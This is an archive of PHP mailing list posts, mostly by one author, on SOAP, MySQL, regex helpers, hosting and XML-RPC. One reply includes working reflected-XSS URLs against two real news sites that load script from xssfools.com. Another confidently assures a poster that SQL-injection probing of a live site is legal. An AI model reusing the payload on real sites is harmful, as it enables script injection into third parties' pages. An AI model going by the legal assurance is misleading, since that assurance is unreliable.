[PHP] PHP5 SOAP...
I'm working on a project using SOAP and WS-Security in which I am failing miserably. Is there a way to inspect the actual XML, header, etc. that is actually being sent. I feel like I am constructing the call correctly, and I know exactly what needs to be sent, but I dont know how to see exactly what is sent - all I get back are useless errors like "not enough information sent", etc... Any ideas? Any SOAP pros out there? Russell Jones CTO Virante, Inc. r...@virante.com 919-459-1035
[PHP] PHP/MYSQL/ Encrypting Sensetive information
We are looking at a project where we will potentially need to store sensetive information in a few fields of a MySQL table. Any recommendations on where to look for best practices in doing this? for encrypting the data, etc.? We will need to be able to decrypt the data as well, although this can probably be done locally, so hashing alone is not really an option. Russell Jones
[PHP] DNS lookup w/ php
If I wanted to determine whether a domain has set up mx records, how could I accomplish this with PHP?
Re: [PHP] Distinguishing between a mouse click and a refresh?
Yes, sort of. lets say that your page is 'http://www.php.net' and you want to make sure your visitor got there with a click, and not a refresh... first, get the referer... $_SERVER['HTTP_REFERER']; then do something like this... $refsite = file_get_contents($_SERVER['HTTP_REFERER']); $refsite = str_replace('"','',$refsite); $refsite = str_replace('"','',$refsite); if(stristr($refsite,'href=http://www.php.net') && !stristr($refsite,"url= http://www.php.net";)) { // it came from a click } else { // maybe not a click } On 12/4/06, Mark London <[EMAIL PROTECTED]> wrote: Is there any way for PHP to know whether it is being called due to a browser refresh versus a mouse click? I think the answer is no but I just want to be sure. Thanks. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Search and Privacy...
You're right - i dont know if there is even a standards body that would cover something like this. I am assuming, along with that answer, that none of the popular php site search tools have implemented it yet. Ill see if i can throw something into one of the more common scripts... Russ On 10/23/06, Chris <[EMAIL PROTECTED]> wrote: Russell Jones wrote: > Does anyone know if any of the PHP Site-Search tools have implemented the > new #privacy search standard (http://www.poundprivacy.org). Looking to > install a new site-search and I would really like to install something that > is compliant... Don't know of any off hand but that site looks like a campaign to make something happen, not a standard. Two completely different things. "Pound Privacy" is a *campaign* to create the first standard for search engine query privacy. -- Postgresql & php tutorials http://www.designmagick.com/
[PHP] PHP Search and Privacy...
Does anyone know if any of the PHP Site-Search tools have implemented the new #privacy search standard (http://www.poundprivacy.org). Looking to install a new site-search and I would really like to install something that is compliant...
[PHP] Simple Array Question...
lets say I have an array... $myArray = array ( "firstkey" => "first val", "secondkey" => "second val" ) Can I still call these by their numeric order? ie, echo $myArray[0] shoudl print out "first val"...
Re: [PHP] Newbie Form Question
In most cases, your PHP build is set up with mail() attached to whatever SMTP you have on the server. you would just use the following... mail($recipientemail,$subject,$message); On 8/4/06, Duncan Hill <[EMAIL PROTECTED]> wrote: On Friday 04 August 2006 13:27, Jay Blanchard wrote: > [snip] > I was wondering how simple it would be to set up a script to provide a > subscribe/unsubscribe form for a list serve. The form would send an > email to > the subscribe address or unsubscribe address as selected. > [/snip] > > I wondered about that the other day myself and came to the conclusion > that it would be really simple. It must be, others have done it. Not terribly difficult at all. One SMTP library for PHP and you're away. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] SQL injection
This is a good question and it, by and large, has not been considered. In this particular instance, their programming is not protected by any kind of encryption laws that would prevent decryption (such as developing and deploying the decryption of Adobe Ebooks format). Furthermore, because you reported the flaw directly to the webmaster and did not publish it, there is no way that you caused any meaningful damage, nor were you acting maliciously. I have exposed XSS errors before on Google via my blog, even wrote a program for April Fools that let you use XSS to post fake articles to real news sites, and never got in trouble for it. You did not even announce the error to the community, so you should be completely safe. In real life terms, if you walked into the store and saw that the cash register was slightly broken and slightly opened, and reached in and pulled out a dollar to show the cashier what was wrong, you would not get in trouble. It may be bold, but it is not a crime. On 8/2/06, Peter Lauri <[EMAIL PROTECTED]> wrote: Hi all, I saw some strange error messages from a site when I was surfing it, and it was in form of SQL. I did some testing of the security of the SQL injection protection of that site, and it showed it was not that protected against SQL injections. To show this to them, I deleted my own record in their database after finding out the table name of the "entity" in the database. I also found out a lot of other that I think is important table names. What I did to them was to report this to them, and inform them about the damage I created, and what could have been done. (I did DELETE FROM tablename WHERE id=1234, what if I did DELETE FROM tablename, destruction if no backup). This is a large "athletic site" in Sweden, with more then 100,000 daily visitors. What I am a little bit worried about is the legal part of this; can I be accused of breaking some laws? I was just doing it to check if they were protected, and I informed them about my process etc. I only deleted my record, no one else's. In Sweden it might have been called "computer break-in", but I am not sure. Anyone with experience of a similar thing? Best regards, Peter Lauri
Re: [PHP] regular expression to extract from the middle of a string
Ill probably get attacked viciously for this with pitchforks and machetes, but I get sick and tired of trying to figure out regular expressions a lot of times, so I use the following functions... getSingleMatch(), getMultiMatch(), getSingleMatchBackwards() function getSingleMatch($start,$end,$content) { // finds the first match giving a beginning and a part of string that you want to grab // eg: to get the title from an html document, you would just use the command getSingleMatch('','',$html); $exp = explode($start,$content); $exp2 = explode($end,$exp[1]); return $exp2[0]; } function getMultiMatch($start,$end,$content) { // finds all the non-embeded matches based on a beginning and ending string // eg: to get all the h1 tags in an html document, you would use getMultiMatch('','',$html); $exp = explode($start,$content); foreach($exp as $pi) { if(stristr($pi,$end)) { $ex2 = explode($end,$pi); $matches[] = $ex2[0]; } } return $matches; } function getSingleMatchBackwards($start,$end,$content) { // the same as getSingleMatch except it goes backwards to forwards. This helps in cases where the // most distinct delimiter is at the end of your target rather than the beginning. $exp = explode($end,$content); $exp2 = explode($start,$exp[0]); return $exp2[count($exp2)-1]; } On 7/14/06, Kim Christensen <[EMAIL PROTECTED]> wrote: On 7/14/06, Steve Turnbull <[EMAIL PROTECTED]> wrote: > I have a string similar to the following; > > cn=emailadmin,ou=services,dc=domain,dc=net > > I want to extract whatever falls between the 'cn=' and the following > comma - in this case 'emailadmin'. $pattern= "/[^=]+=([^,]+)/"; preg_match($pattern, $string, $matches); print_r($matches); Voila! (Untested for now, I'm pretty drunk so sorry if it ain't workin out like you want to) -- Kim Christensen -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Language Translation (spanish->english) PHP
Anyone know of an API (soap, xml-rpc, rest, anything) for PHP that assists with language translation? Thanks Russ
[PHP] Language Translation and PHP...
Anyone know of any language translation APIs or anything of that sort out there? Looking to translate quite a bit of content and would rather not do it by hand.
[PHP] PHP and mySQL getting smashed...
I have a site that is getting 30K+ traffic daily and it is smashing mySQL - any ideas on what to do to make the mysql connections more efficient, or anything in general. No bandwidth issue here, just the server getting killed. Thanks
[PHP] Download image in PHP
I have an image library on one site that I want to be able to access from another, but I actually want the image downloaded and cached to the new site (so that it doesnt keep taxing the image server). I allow the file() command to pull from other sites, can I do this with just the file('http://www.site.com/image.jpg";); - or how would i do this? Russ
Re: [PHP] microsoft PHP ?
Are you guys sure, I mean the St Louis Post Dispatch is showing it too... As is Cincinatti.com http://search.cincinnati.com/sp?aff=5&keywords=%3Cscript%20src=http://www.xssfools.com/xss.php%3Fy%3Dh917254010%3E%3C/script%3E http://www.stltoday.com/stltoday/search.nsf/sitesearchresults?openview&type=1&ch=Home&query=%3Cscript+src%3Dhttp%3A%2F%2Fwww.xssfools.com%2Fxss.php%3Fy%3Dh917254010%3E%3C%2Fscript%3E On 4/1/06, Stut <[EMAIL PROTECTED]> wrote: > > Joe Wollard wrote: > > Leave poor Zouari alone! I for one think that Microsoft buying Zend > > would be the best thing to happen to PHP, EVAR! This Rasmus guy didn't > > even mean for PHP to be what it is, he just wanted something simple and > > now look at it. It's WAY to complex for an unorganized bunch of > > hobbyists to maintain. I'm personally looking forward to the way they'll > > clean things up. Who knows, maybe once they've got PHP under control we > > won't need these security 'experts' like Chris Shifflett any more > > because would be hackers won't be able to see the source code, which of > > course means they won't be able to find vulnerabilities. You guys just > > need to give up on this open source hippie dream and let Microsoft > > change things for the better - who cares if Stephen King thinks they are > > working in conjunction with the Crimson King and that they might build > > robots that will someday take over the world and more or less 'suck the > > s-m-r-t' out of 50% of the worlds twins? He looks creepy anyway. > > > > - and a happy April fool's to all ;-) > > Here's assuming that was a joke so I won't get into the factual errors. > I wonder how Zend and the other core developers will feel about being > referred to as "an unorganized bunch of hobbyists". > > -Stut > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] XML-RPC or SOAP
I would go with XML-RPC. I currently use XML-RPC to run LinkSleeve - a link-spam detection tool. In my opinion, I have found XML-RPC to be easier to use and understand. If at any point in your product you will be dealing with customers / vendors who will be beginners with both XML-RPC and SOAP, I would say the learning curve for XML-RPC is much lower. I do feel, however, that SOAP is potentially a more robust solution. Anyway, just my 2 cents and, good luck. On 3/30/06, Philip Hallstrom <[EMAIL PROTECTED]> wrote: > > > I am at the beginning of creating a web service. As I am not very > familar > > with both SOAP and XML-RPC it would not make much difference in which > one I > > learn. > > > > Which one would you guys recommend for a web app that has to be > transformed > > into a white lable solution. > > I just did one using SOAP. Seems to work just fine. Just be sure to get > the WSDL generator from here: > > http://www.schlossnagle.org/~george/php/WSDL_Gen.tgz > > We did it using PHP5's soap extension. > > good luck! > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] Re: Detect where someone comes from
If you want to find out who is actually linking to you altogether (such as for search engine optimization, etc.) you are going to want to use the following search query in Yahoo... linksite:yoursite.com -site:yoursite.com This will tell you everyone who is linking to you minus the links coming from your site. Google only shows a subset of the links pointing to you, and it is difficult to exclude your own domain from those results. MSN doesn't have a deep enough spider to really give you an accurate response, so Yahoo is the best. There are some more tricks if you are interested, shoot me an email. Russ Jones CTO Virante, Inc. On 3/6/06, Barry <[EMAIL PROTECTED]> wrote: > > Benjamin Adams wrote: > > I was wondering if there was a way I can see where people are linking > > to me from. Can I find this in php? > > --Ben > $_SERVER["HTTP_REFERER"]; > > It's an Apache server variable. > > -- > Smileys rule (cX.x)C --o(^_^o) > Dance for me! ^(^_^)o (o^_^)o o(^_^)^ o(^_^o) > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] Help Defending against Email Injection Attacks
Why dont you just break the code. Before anything goes through replace colons with dashes, dashes with underscores, etc. Stuff that will not mess up readability but would prevent it from being parsed by the mail function. On 2/6/06, Jim Moseby <[EMAIL PROTECTED]> wrote: > > > - The most foolproof solution I can think of would be to continue > > logging the successful entries to a database and _not_ send the email. > > That way even if they get through, no emails get sent. The form would > > log the feedback and send an email to the admin that a comment is > > available for viewing. Is it time to abandon using mail() for all user > > contributed data? > > > I think you have hit it on the head. Don't use the mail() function at all > in your web form. You already have in place almost everything you need to > thwart these buggers. Just have cron kick off a script every so often > (5,10,30 minutes?) that reads through the database for new comments, and > mails them to the appropriate recipient(s). > > JM > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] PHP hosting with multiple domains?
Host-Gator has a fantastic, cheap reseller program, although you aren't sharing space within 1 account. My real recommendation would be ServerPronto though. $29.95/mo for a dedicated with 40gig space. It works great for me, and you can host all the domains you want. You will have to learn how to use Apache, though. Russ On 2/2/06, Richard Lynch <[EMAIL PROTECTED]> wrote: > > Maybe look for reseller acccounts and become your own reseller for all > the sub-accounts. > > Or find somebody who gives enough HD space for your biggest accounts > that you don't care about sharing. > > On Mon, January 30, 2006 11:34 am, [EMAIL PROTECTED] wrote: > > I know every month or so someone asks "What's a good web hosting > > company to use for my PHP projects?".. I have most of the responses > > archived and have searched online a bit, but I have a specific "wish" > > and was hoping someone else had already found a good hosting company > > that'd let me do what I want. > > > > I want PHP (either 4 or 5, I'm not too picky) and MySQL. > > > > The thing I'm having trouble nailing down is one that might let me > > host multiple domains under a single hosting account and share > > bandwidth and HD space. I have a couple of domains that aren't > > really doing anything right now (none of my domains really generate > > any traffic right now but could in the future). But instead of paying > > to upgrade the storage of one domain then paying again to upgrade the > > storage of another one... I'd like them to share harddrive space and > > bandwidth. > > > > Failing that, Doster (the registrar I use) can let me point a domain > > to a subdirectory on another domain (ie. http://www.altdomain.com > > actually lives at http://www.maindomain.com/altdomain). > > > > > > The hosting company I'm with right now is great for the fact that I > > locked my domains in at $20/year before they upped their prices > > (yeah... twenty per year) but they're kind of mom & pop and I'd like > > some place a little bigger and more professional even if it means > > paying more per month. > > > > I'm more interested in storage space than bandwidth right now, but > > that may change later (as the stuff being stored is accessed of > > course). > > > > I don't need many email addresses or databases. Don't need a shell > > account. Cron jobs/scheduled tasks (of PHP scripts) would be really > > nice. > > > > hah.. I'll stop now. Think you get the idea. The convenient > > management of multiple domains with a hosting provider is my ultimate > > goal. > > > > Thanks. > > > > -TG > > > > ___ > > Sent by ePrompter, the premier email notification software. > > Free download at http://www.ePrompter.com. > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > > > -- > Like Music? > http://l-i-e.com/artists.htm > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
[PHP] Clean data / text for XML
Any good classes or scripts out there to just clean data that will be placed into XML? I always have a problem with random "tokens" ruining XML and I would prefer if I could just find a way to clean all the junk out before putting it into an xml file.
Re: [PHP] way to write mysqli result set to disk
It may be better to go ahead and convert it to an array, or something that can be handled more quickly when the cache is pulled than interpreting the result again and again and again... Really dont know, just a thought. On 1/25/06, jonathan <[EMAIL PROTECTED]> wrote: > > is there a way to write a mysqli result set to disk via > file_put_contents or fwrite. it looks like we'd have to convert it to > an array and then handle the array upon bringing it back in. I'm > interested in writing a simple caching mechanism where sql results > would be cached. > > thanks, > > jonathan > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
[PHP] XML-RPC questions...
I have read recently that there are some issues with XML-RPC and security in PHP classes. Have these been fixed? What would you recommend? I am looking to create a LinkSleeve filter for my blog and it requires XML-RPC. rjonesx
[PHP] XML-RPC and comment spam...
I am trying to set up a personal blog of mine with the new LinkSleeve.orgXML-RPC link spam service, but I dont know the firs thing about PHP and XML-RPC. I did read that there are some problems with security, though, with the popular PHP XML-RPC classes. Have these been fixed and which would you all recommend? rjones